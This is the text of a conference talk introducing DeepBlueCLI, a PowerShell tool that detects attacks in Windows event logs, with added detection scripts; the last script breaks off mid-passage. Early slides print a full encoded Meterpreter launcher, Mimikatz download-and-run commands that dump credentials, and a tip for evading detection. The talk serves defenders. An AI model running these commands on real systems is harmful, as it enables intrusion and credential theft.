
DeepBlueCLI

C511

Introducing DeepBlueCLI
a PowerShell Module for Hunt Teaming via Windows Event Logs

Eric Conrad (GSE #13)
@eric_conrad
Welcome!

• A copy of this talk is available at http://ericconrad.com
• Includes a link to the DeepBlueCLI GitHub site
o https://github.com/sans-blue-team/DeepBlueCLI/
o Plus sample evtx files for all major events discussed

Introducing DeepBlueCLI 2
Sunlight is the Best Disinfectant – Louis Brandeis

• Malware and exploit frameworks have been evolving faster than common preventive technologies have kept up
o Detective controls allow more aggressive checks
• By default Metasploit creates random service names like this:
o Service Name: GWRhKCtKcmQarQUS
o Service name matches: ^[A-Za-z]{16}$
• Blocking 16 character service names containing only upper and lower alpha characters could lead to false positives
• This is how you fight, and this is how you win:
o Automatically detect these names, married with rapid incident response

The Evolution of Windows Malware Payloads

Malware and exploit frameworks often copy an exe to the filesystem
• Often in c:\windows\system32\RanDOmNAme.exe
• Metasploit exploit target: Native upload
• Corporate malware defenses are designed to prevent this

Newer malware and exploitation frameworks are migrating to PowerShell for post exploitation
• They avoid using .ps1 files, and load the code via (very long) command lines, or use the PowerShell WebClient.DownloadString Method
• Metasploit exploit target Powershell uses a long compressed and base64-encoded PowerShell function loaded via cmd.exe

Metasploit Meterpreter Payload via Command Line
C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq
4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object
System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM
2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7m
PqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFi
mzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGj
xjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8Hp
D3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCP
P+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAy
CS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuu
r/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8Zy
NlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyW
zmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqV
KPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6
TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgf
jAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3T
bf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSd
SogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1
F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX
(New-Object IO.StreamReader(New-Object
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecut
e=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnost
ics.Process]::Start($s);

Details

• Command is > 2400 bytes
• powershell.exe launched via cmd.exe
• Hidden PowerShell window
• gzip compressed and Base64 encoded PowerShell function
o To analyze: decode base64, and then decompress with gzip
o Result: obfuscated PowerShell function

Obfuscated PowerShell Function (after base64 -d and gzip -d)

Payload via Net.WebClient

Executing PowerSploit's Invoke-Mimikatz.ps1 via Net.WebClient:
• C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

Same method via short URL:
• C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"
• Note that 'ps1' is not included in the command line

Advantages to these Methods

• Antivirus will allow cmd.exe and powershell.exe to execute
• There are no files saved to the disk to scan
• If the system is using application whitelisting: cmd.exe and powershell.exe will be whitelisted
• Restricting execution of ps1 files via Set-ExecutionPolicy settings has no effect
o "Set-ExecutionPolicy is not a Security Control" - @Ben0xA, yesterday
• There is no logging of process command lines or PowerShell commands by default (hold that thought)
• Preventive and detective controls tend to allow and ignore these methods

Windows 7

• Windows 10 offers a wealth of security features
o Upgrade if you can
• This talk will focus on detecting malicious events on Windows 7
o Windows 7 offers a "sweet spot" for clients
• All recommendations can be achieved with a Windows 7, free Microsoft downloads, plus DeepBlueCLI
o All of these events (and more) can also be detected on Windows 8+

Log Full Command Line of all Processes

• Windows 7+ now supports logging full command line of all launched processes natively
• Turn this on!
• Run gpedit.msc and set:
o Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\System Audit Policies\Detailed Tracking
o Computer Configuration\Administrative Templates\System\Audit Process Creation
• Then monitor:
o PS> Get-WinEvent -FilterHashtable @{Logname="Security"; ID=4688}

Security Event 4688

• Security event 4688 is the highest value Windows event, IMO
o It can be used to reliably detect most modern post exploitation techniques
• There is one caveat: passwords may be disclosed via this event

Command Lines to Look For

Once logging full command lines: search for the following:
• Loooooooooong commands (1,000+ bytes)
• csc.exe (C# compiler)
• cvtres.exe (Resource File To COFF Object Conversion Utility)
• rundll32.exe and cscript.exe
• .vbs scripts
• schtasks and at
• Anything launched from a temp folder
• Launching PowerShell via cmd.exe
• Base64 encoded commands

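The three slides above describe one procedure: enable command-line logging, read event 4688, and search the command lines for the listed patterns. The script below is an added example and not DeepBlueCLI's code. It assumes the registry value ProcessCreationIncludeCmdLine_Enabled is the one the "Include command line in process creation events" policy writes; the regexes, the 1000-byte threshold and the sample command line are constructed for the illustration.

```powershell
# Added example (not DeepBlueCLI's code): confirm that command-line auditing is on,
# then read Security event 4688 and flag the "Command Lines to Look For" patterns.
# Assumed: the registry value below is the one the GPO setting "Include command line
# in process creation events" writes. Patterns and the sample line are constructed here.

function Test-CommandLineAuditing {
    # Without this value, 4688 is logged but the CommandLine field stays empty.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'
    $p = Get-ItemProperty -Path $key -Name 'ProcessCreationIncludeCmdLine_Enabled' -ErrorAction SilentlyContinue
    return ($null -ne $p -and $p.ProcessCreationIncludeCmdLine_Enabled -eq 1)
}

# Label/regex pairs for the indicators listed on the slide (constructed regexes).
# "at" is a short word, so the schtasks/at pattern will occasionally hit benign text.
$script:Indicators = @(
    @{ Name = 'csc.exe (C# compiler)';  Pattern = '\bcsc\.exe\b' },
    @{ Name = 'cvtres.exe';             Pattern = '\bcvtres\.exe\b' },
    @{ Name = 'rundll32/cscript';       Pattern = '\b(rundll32|cscript)\.exe\b' },
    @{ Name = '.vbs script';            Pattern = '\.vbs\b' },
    @{ Name = 'schtasks/at';            Pattern = '(^|\s)(schtasks|at)(\.exe)?\s' },
    @{ Name = 'Launched from temp';     Pattern = '\\(temp|tmp)\\' },
    @{ Name = 'PowerShell via cmd.exe'; Pattern = 'cmd\.exe.*powershell' },
    @{ Name = 'Base64 argument';        Pattern = '[A-Za-z0-9+/]{200,}={0,2}' }
)

function Test-SuspiciousCommandLine {
    param([Parameter(Mandatory=$true)][string]$CommandLine, [int]$LengthThreshold = 1000)
    $hits = @()
    if ($CommandLine.Length -ge $LengthThreshold) { $hits += "Long command line ($($CommandLine.Length) chars)" }
    foreach ($i in $script:Indicators) {
        if ([regex]::IsMatch($CommandLine, $i.Pattern, 'IgnoreCase')) { $hits += $i.Name }
    }
    return ,$hits
}

function Get-SuspiciousProcessEvents {
    # Live Security log by default; pass -Path to read an exported .evtx instead.
    param([string]$Path)
    $filter = @{ LogName = 'Security'; ID = 4688 }
    if ($Path) { $filter = @{ Path = $Path; ID = 4688 } }
    foreach ($e in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        # Pull fields by name from the event XML rather than by position.
        $data = ([xml]$e.ToXml()).Event.EventData.Data
        $cl   = ($data | Where-Object { $_.Name -eq 'CommandLine' }).'#text'
        $exe  = ($data | Where-Object { $_.Name -eq 'NewProcessName' }).'#text'
        if (-not $cl) { continue }
        $hits = Test-SuspiciousCommandLine -CommandLine $cl
        if ($hits.Count -gt 0) {
            # Command lines can carry passwords (the 4688 caveat), so treat this output as sensitive.
            New-Object PSObject -Property @{
                Time = $e.TimeCreated; Process = $exe; Indicators = ($hits -join '; '); CommandLine = $cl
            }
        }
    }
}

# Constructed sample: the shape of the Metasploit launcher from the slides, payload replaced by filler.
$sample = 'C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c ' + ('A' * 1200)
"Command-line auditing enabled: $(Test-CommandLineAuditing)"
"Indicators for sample: $((Test-SuspiciousCommandLine -CommandLine $sample) -join '; ')"
```

Run it as-is to see the sample line trip the length, cmd.exe-to-PowerShell and base64 checks, then call Get-SuspiciousProcessEvents (or Get-SuspiciousProcessEvents -Path some.evtx) on a host where Test-CommandLineAuditing returns True.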
PowerShell Logging

PowerShell 4.0 (default on Windows 8.1) includes additional logging
• Can be installed on Windows 7 SP1, easy
• Event 4103 (Module Logging) is very helpful
• DeepBlueCLI analyzes this event

PowerShell 5.0 (default on Windows 10) adds more logging
• Windows 7 SP1 install takes multiple steps
• PowerShell v5 works on Windows 7 SP1, but…
o It's easy to break PowerShell logging

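Because the slide warns that PowerShell logging on Windows 7 SP1 is easy to break, a practitioner wants a quick check that module logging (the source of event 4103) is really on before relying on it. The script below is an added example, not from the talk or from DeepBlueCLI. It assumes the ModuleLogging registry keys are the policy keys behind the "Turn on Module Logging" GPO setting and that Microsoft-Windows-PowerShell/Operational is the log that receives 4103; the version check follows the slide (4.0 or later).

```powershell
# Added example, not from the talk: check that module logging (the source of event 4103) is
# actually on, then read recent 4103 records. Assumed: the registry keys are the policy keys
# behind "Turn on Module Logging"; the log name is the PowerShell 4/5 operational log.

function Test-ModuleLoggingPolicy {
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging'
    $r = New-Object PSObject -Property @{
        PSVersion = $PSVersionTable.PSVersion.ToString(); Enabled = $false; Modules = @(); Problems = @()
    }
    if ($PSVersionTable.PSVersion.Major -lt 4) { $r.Problems += 'PowerShell 4.0 or later is needed for event 4103' }
    $p = Get-ItemProperty -Path $key -Name 'EnableModuleLogging' -ErrorAction SilentlyContinue
    if ($p -and $p.EnableModuleLogging -eq 1) { $r.Enabled = $true } else { $r.Problems += 'EnableModuleLogging is not 1' }
    # ModuleNames holds one value per module to log; a value named * logs every module.
    $names = Get-Item -Path "$key\ModuleNames" -ErrorAction SilentlyContinue
    if ($names) { $r.Modules = @($names.GetValueNames()) }
    if ($r.Modules.Count -eq 0) { $r.Problems += 'ModuleNames is empty; add a value named * to log all modules' }
    $log = Get-WinEvent -ListLog 'Microsoft-Windows-PowerShell/Operational' -ErrorAction SilentlyContinue
    if (-not $log) { $r.Problems += 'Microsoft-Windows-PowerShell/Operational log is missing' }
    elseif (-not $log.IsEnabled) { $r.Problems += 'Microsoft-Windows-PowerShell/Operational log is disabled' }
    return $r
}

function Get-ModuleLoggingEvents {
    # Newest 4103 records from the live log or an exported .evtx; Message holds the CommandInvocation text.
    param([int]$Newest = 20, [string]$Path)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; ID = 4103 }
    if ($Path) { $filter = @{ Path = $Path; ID = 4103 } }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $Newest -ErrorAction SilentlyContinue |
        ForEach-Object { New-Object PSObject -Property @{ Time = $_.TimeCreated; Summary = (($_.Message -split "`r?`n")[0]) } }
}

$check = Test-ModuleLoggingPolicy
"PowerShell $($check.PSVersion); module logging enabled: $($check.Enabled); modules: $($check.Modules -join ', ')"
if ($check.Problems.Count -gt 0) { $check.Problems | ForEach-Object { "Problem: $_" } }
Get-ModuleLoggingEvents -Newest 5 | Format-Table -AutoSize
```

An empty Problems list plus a non-empty stream of 4103 records is the state DeepBlueCLI's module-logging analysis depends on; any reported problem means the event it parses is not being written.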
EMET

• Microsoft's EMET (Enhanced Mitigation Experience Toolkit) is a tool that hardens Windows operating systems against a series of common exploit tactics
o Free download from Microsoft
• Can be used to harden any version of Windows from XP and 2003 through Windows 10 and Server 2012
o Older EMET versions are helpful for helping protect legacy operating systems such as Windows XP and Windows Server 2003 (both end of life)
• In my testing: Windows 7 becomes a much harder target once EMET is installed
• One thing I can recommend is anti-exploitation features. Microsoft EMET: everybody ought to be turning that on – Rob Joyce, NSA

EMET Logs

Detect when EMET blocks Malware:
• PS> Get-WinEvent -FilterHashtable @{LogName="application"; ProviderName="EMET"; id=2}

Introducing DeepBlueCLI – Beta 0.1

• Announcing the public release of DeepBlueCLI beta 0.1
• 100% PowerShell, runs on PowerShell 2.0 (Windows 7 default) or higher
o Can process PowerShell 4.0/5.0 event logs
• Can automatically detect all examples discussed previously
o And more
• Processes local event logs, or evtx files

The Genesis of DeepBlueCLI

• Logging new process creation: easy
PS> Get-WinEvent -FilterHashtable @{Logname="Security"; ID=4688}
• Logging processes launched with long command lines, or commands that match certain malicious patterns: requires scripting
• Telling clients "just write a script" usually results in blank stares
o My keen powers of inference tell me that SOC scripters are rare
o OK, let me write the script…

The Script

• How hard could it be?
o Famous last words as you confidently submit a DerbyCon CFP
• Some event data is well-formed and easily parsed XML
• Other event data (*cough*, EMET, *cough*) is a blob of text
o Fortunately, PowerShell has strong regex support
• In the end, each event requires custom code to:
o Detect malice
o Generate concise, actionable output

DeepBlueCLI – Design Notes

• Focus is on quality, not quantity
o All killer, no filler
o Not "shovel events into/out of a tool"
• Each reported event type has a specific malicious use case to support it
• Initial tool focus is on high quality, actionable events, and the underlying logic to detect them
• Output is currently basic text, but designed to be actionable
o Plan to add csv, xml and PowerShell object output modes in the future

Dodging DeepBlueCLI

• Many of the techniques used by DeepBlueCLI can be evaded
o DeepBlueCLI identifies commands containing 'mimikatz'
o Dodge by renaming 'mimikatz' to 'mimidogz'
• Dodging all of the techniques is difficult
o Long command lines
o Use of Net.WebClient
o base64-encoded functions
o Compressed functions
• Many IT professionals commit the perfect solution fallacy

Beware of the Perfect Attacker Fallacy

Paraphrasing collective feedback from my change-resistant clients:
• Well, APT will certainly use zero-day exploits to bypass patching, and also bypass EMET without triggering any EMET logs, and inject malware into RAM to avoid whitelisting, and create realistic-looking registry run keys to maintain persistence, and phone home quite infrequently via Facebook to evade command-and-control detection, and use perfect user-agents, and…

To quote Grace Hopper:
• The most damaging phrase in the language is "We've always done it this way!"
• Humans are allergic to change. They love to say, "We've always done it this way." I try to fight that. That's why I have a clock on my wall that runs counter-clockwise.

DeepBlueCLI: Current List of Detected Events

• Long command lines
• Long PowerShell commands
• Regex matching PowerShell and CL
• Base64 encoded CL or PowerShell
• Compressed/Base64 encoded CL or Powershell
• PowerShell Net.WebClient
• EMET Blocks
• Applocker Blocks
• Suspicious service creation
• Service errors
• User creation
• Users added to Local/Global Admin group
• High number of logon failures

DeepBlueCLI: Regex Matching Command Lines

Regular expression matching PowerShell and command lines via simple CSV file

DeepBlueCLI - Whitelist

Some benign commands create giant command lines, for example:

"C:\Program Files\Google\Update\GoogleUpdate.exe" /ping
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB2ZXJzaW9uPSIxLjMuMzEuNSIgc2h
lbGxfdmVyc2lvbj0iMS4zLjI5LjUiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7ODM4NDRDNEEtOUU5OS00OTZBLTk4N0MtMkU0REE3NEI0QT
ZDfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9IntCOTZCM0VCQi0yMzkwLTRBNTctQUFBMC05MEMxNjJFOUQ5QTB9IiBkZ
WR1cD0iY3IiPjxodyBwaHlzbWVtb3J5PSIzIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEi
IGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSI2LjEiIHNwPSJTZXJ2aWNlIFBhY2sgMSIgYXJjaD0ieDg2Ii8-
PGFwcCBhcHBpZD0iezREQzhCNENBLTFCREEtNDgzRS1CNUZBLUQzQzEyRTE1QjYyRH0iIHZlcnNpb249IjUyLjAuMjc0My4xMTYiIG5leHR2ZXJ
zaW9uPSI1My4wLjI3ODUuMTE2IiBhcD0iLW11bHRpLWNocm9tZSIgbGFuZz0iIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGNvaG9ydD0iMTpiOD
oiIGNvaG9ydG5hbWU9IlN0YWJsZSI-
PGV2ZW50IGV2ZW50dHlwZT0iMTIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXB
lPSIxMyIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3
VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHA6Ly9yZWRpcmVjdG9yLmd2dDEuY
29tL2VkZ2VkbC9yZWxlYXNlMi80MDl2cGRuaGlrem5rd3BnOGEwZTdnZ2FiZWVtbG5qOGNhem4xczRrcnM5aW52ZjZkbHo0MXltcWtyMHlkY2Zj
emFlOGd3ZXZ4OGVnNndkZnl4czhldThna3E2OXpjYXloazUvNTMuMC4yNzg1LjExNl81Mi4wLjI3NDMuMTE2X2Nocm9tZV91cGRhdGVyLmV4ZSI
gZG93bmxvYWRlZD0iMTYzMzM0MDAiIHRvdGFsPSIxNjMzMzQwMCIgZG93bmxvYWRfdGltZV9tcz0iMzY5MzIzMCIvPjxldmVudCBldmVudHR5cG
U9IjE0IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-
PGV2ZW50IGV2ZW50dHlwZT0iMTUiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXB
lPSIzIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzb3VyY2VfdXJsX2luZGV4PSIwIiB1cGRhdGVfY2hlY2
tfdGltZV9tcz0iMTk2OSIgZG93bmxvYWRfdGltZV9tcz0iMzY5Mzg4NiIgZG93bmxvYWRlZD0iMTYzMzM0MDAiIHRvdGFsPSIxNjMzMzQwMCIga
W5zdGFsbF90aW1lX21zPSIyNTA2MiIvPjwvYXBwPjwvcmVxdWVzdD4

DeepBlueCLI supports a whitelist to ignore these commands

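The two slides above describe the same data-driven mechanism from both sides: a CSV of detection regexes, and a CSV whitelist that suppresses known-benign giants such as the GoogleUpdate ping. The script below is an added example and is not DeepBlueCLI's own regex or whitelist file; the rule names, patterns, the whitelist entry and the sample command lines are constructed, and the CSV text is embedded inline so it runs stand-alone (a file would be loaded with Import-Csv in the same way).

```powershell
# Added example, not DeepBlueCLI's own regex or whitelist files: a CSV of detection regexes
# plus a CSV whitelist applied first, embedded inline so it runs stand-alone.
# Rule names, patterns, the whitelist entry and the sample command lines are all constructed.

$rulesCsv = @'
Name,Regex
Mimikatz,mimikatz
Net.WebClient download,Net\.WebClient.*DownloadString
PowerSploit cmdlet,Invoke-(Mimikatz|Shellcode|DllInjection)
Heavy string concatenation,(\+[^+]*){10}
'@

# Benign-but-huge command lines such as the GoogleUpdate ping above; matched before any rule runs.
$whitelistCsv = @'
Description,Regex
Google Update ping,\\Google\\Update\\GoogleUpdate\.exe\W+/ping
'@

function Import-RegexCsv {
    # Loads a rule or whitelist table from CSV text and rejects malformed regexes up front,
    # so one bad line fails loudly here instead of silently skipping matches during a scan.
    param([Parameter(Mandatory=$true)][string]$Csv)
    $rows = @(($Csv -split "`r?`n") | ConvertFrom-Csv)
    foreach ($r in $rows) {
        try { [void](New-Object regex -ArgumentList $r.Regex) } catch { throw "Invalid regex in CSV: $($r.Regex)" }
    }
    return ,$rows
}

function Test-CommandLineRules {
    param(
        [Parameter(Mandatory=$true)][string]$CommandLine,
        [Parameter(Mandatory=$true)]$Rules,
        $Whitelist = @()
    )
    # A whitelist hit wins outright: the command is known noise, so no rule is evaluated.
    foreach ($w in $Whitelist) {
        if ([regex]::IsMatch($CommandLine, $w.Regex, 'IgnoreCase')) { return ,@() }
    }
    $matched = @()
    foreach ($r in $Rules) {
        if ([regex]::IsMatch($CommandLine, $r.Regex, 'IgnoreCase')) { $matched += $r.Name }
    }
    return ,$matched
}

$rules     = Import-RegexCsv -Csv $rulesCsv
$whitelist = Import-RegexCsv -Csv $whitelistCsv

# Constructed samples: the short-URL PowerSploit one-liner from slide 8, a command built from
# many "+" string joins, and a GoogleUpdate ping carrying a long base64-looking argument.
$samples = @(
    'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''http://eic.me/17''); Invoke-Mimikatz -DumpCreds"',
    'powershell.exe -c "IEX (''Wr''+''it''+''e-''+''Ho''+''st''+'' ''+''he''+''ll''+''o''+''!''+''!'')"',
    '"C:\Program Files\Google\Update\GoogleUpdate.exe" /ping ' + ('A' * 300)
)
foreach ($s in $samples) {
    $hits = Test-CommandLineRules -CommandLine $s -Rules $rules -Whitelist $whitelist
    New-Object PSObject -Property @{ Hits = ($hits -join ', '); CommandLine = $s.Substring(0, [Math]::Min(70, $s.Length)) }
}
```

The first sample trips three rules, the second only the concatenation rule (ten "+" joins is the constructed threshold), and the third produces no hits because the whitelist matched before any rule ran. Keep whitelist regexes anchored to the executable path, as here, so that a long argument alone never earns a command a free pass.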
DeepBlueCLI: Base64 and/or Compressed Commands

• DeepBlueCLI attempts to automatically detect base64-encoded commands
o And automatically decode them
• If the commands are also compressed (Metasploit-style) it will also uncompress them
• In both cases: it will then scan the normalized command for malicious regular expression matches

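This slide and the "Details" slide for the Meterpreter launcher describe the same normalisation step: find the base64 blob, decode it, gunzip it if it is gzip, and only then run the regex scan. The script below is an added example and not DeepBlueCLI's implementation. Its sample payload is constructed here (a harmless string compressed and base64-encoded the same way the slide 5 launcher is, with a placeholder URL), so nothing is downloaded or executed; the 64-character minimum for a base64 run and the UTF-16 heuristic for -EncodedCommand blobs are my choices.

```powershell
# Added example (not DeepBlueCLI's implementation) of the normalisation described above: find a
# long base64 run in a command line, decode it, gunzip it when it is gzip, and hand the plaintext
# to the regex scan. The payload is constructed here, the same gzip+base64 layering as slide 5.

function ConvertFrom-EncodedBlob {
    param([Parameter(Mandatory=$true)][string]$Base64)
    $bytes = [Convert]::FromBase64String($Base64)   # throws on non-base64 input; callers catch it
    # gzip members start with 0x1f 0x8b, which is why Metasploit blobs begin with "H4sI".
    if ($bytes.Length -ge 2 -and $bytes[0] -eq 0x1f -and $bytes[1] -eq 0x8b) {
        $ms = New-Object IO.MemoryStream(,$bytes)
        $gz = New-Object IO.Compression.GzipStream($ms, [IO.Compression.CompressionMode]::Decompress)
        $sr = New-Object IO.StreamReader($gz)
        $text = $sr.ReadToEnd()
        $sr.Close()
        return $text
    }
    # Not compressed: -EncodedCommand blobs are UTF-16LE (every second byte is 0 for ASCII text).
    if ($bytes.Length -ge 2 -and $bytes[1] -eq 0) { return [Text.Encoding]::Unicode.GetString($bytes) }
    return [Text.Encoding]::UTF8.GetString($bytes)
}

function Get-NormalizedCommand {
    # Replace every long base64 run with its decoded text; runs that do not decode are left alone.
    param([Parameter(Mandatory=$true)][string]$CommandLine)
    $out = $CommandLine
    foreach ($m in [regex]::Matches($CommandLine, '[A-Za-z0-9+/]{64,}={0,2}')) {
        try { $out = $out.Replace($m.Value, (ConvertFrom-EncodedBlob -Base64 $m.Value)) } catch { }
    }
    return $out
}

function New-GzipBase64Blob {
    # Helper used only to build the constructed sample (gzip, then base64, as the launcher does).
    param([string]$Text)
    $ms = New-Object IO.MemoryStream
    $gz = New-Object IO.Compression.GzipStream($ms, [IO.Compression.CompressionMode]::Compress)
    $data = [Text.Encoding]::UTF8.GetBytes($Text)
    $gz.Write($data, 0, $data.Length)
    $gz.Close()
    return [Convert]::ToBase64String($ms.ToArray())
}

# Constructed sample: an inner command carrying the page's Net.WebClient indicator, wrapped the
# Metasploit way. The URL is a placeholder and is never contacted.
$inner = 'IEX (New-Object Net.WebClient).DownloadString(''http://example.invalid/payload'')'
$blob  = New-GzipBase64Blob -Text $inner
$launcher = 'powershell.exe -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''' + $blob + '''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();'
$normalized = Get-NormalizedCommand -CommandLine $launcher
"Raw launcher mentions WebClient: $($launcher -match 'Net\.WebClient')"
"Normalized command mentions WebClient: $($normalized -match 'Net\.WebClient')"
```

The raw launcher contains no "Net.WebClient" string at all (a base64 alphabet cannot even hold the dot), so a regex scan of the unnormalised 4688 command line would miss it; the normalised text matches. Feed Get-NormalizedCommand's output, not the raw CommandLine field, to whatever regex list is in use.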
Use Case: DeepBlueCLI vs. SMB Password Guessing

This Metasploit SMB password guessing attack generates 3561 security event logs

DeepBlueCLI creates one entry
• Design goal: summarize, don't DoS

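The script below shows the "summarize, don't DoS" idea in working code: a burst of Security 4625 logon-failure events is collapsed into one record per source address. It is an added example and not DeepBlueCLI's code. The 100-failure threshold, the sample records (3561 failures from one constructed address plus one stray typo from another) and the field names read from 4625 (TargetUserName, IpAddress, WorkstationName) are as assumed here.

```powershell
# Added example, not DeepBlueCLI's code: collapse a burst of Security 4625 (logon failure) events
# into one summary record per source address. The threshold and all sample records are constructed.

function Get-EventField {
    param($Data, [string]$Name)
    return ($Data | Where-Object { $_.Name -eq $Name }).'#text'
}

function Get-LogonFailures {
    # Reads 4625 from the live Security log (or -Path for an exported .evtx) into flat objects.
    param([string]$Path)
    $filter = @{ LogName = 'Security'; ID = 4625 }
    if ($Path) { $filter = @{ Path = $Path; ID = 4625 } }
    foreach ($e in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        $d = ([xml]$e.ToXml()).Event.EventData.Data
        New-Object PSObject -Property @{
            Time        = $e.TimeCreated
            Account     = Get-EventField $d 'TargetUserName'
            Source      = Get-EventField $d 'IpAddress'
            Workstation = Get-EventField $d 'WorkstationName'
        }
    }
}

function Get-LogonFailureSummary {
    # One record per source with at least $Threshold failures; anything below that is left as noise.
    param([Parameter(Mandatory=$true)]$Failures, [int]$Threshold = 100)
    foreach ($g in ($Failures | Group-Object -Property Source)) {
        if ($g.Count -lt $Threshold) { continue }
        $sorted   = @($g.Group | Sort-Object -Property Time)
        $accounts = @($g.Group | Select-Object -ExpandProperty Account -Unique)
        New-Object PSObject -Property @{
            Source         = $g.Name
            Failures       = $g.Count
            UniqueAccounts = $accounts.Count
            FirstSeen      = $sorted[0].Time
            LastSeen       = $sorted[-1].Time
            Note           = "Possible password guessing: $($g.Count) failures against $($accounts.Count) accounts"
        }
    }
}

# Constructed sample: 3561 failures from one address against four accounts inside a minute, plus a
# single mistyped password from another host that must not be reported.
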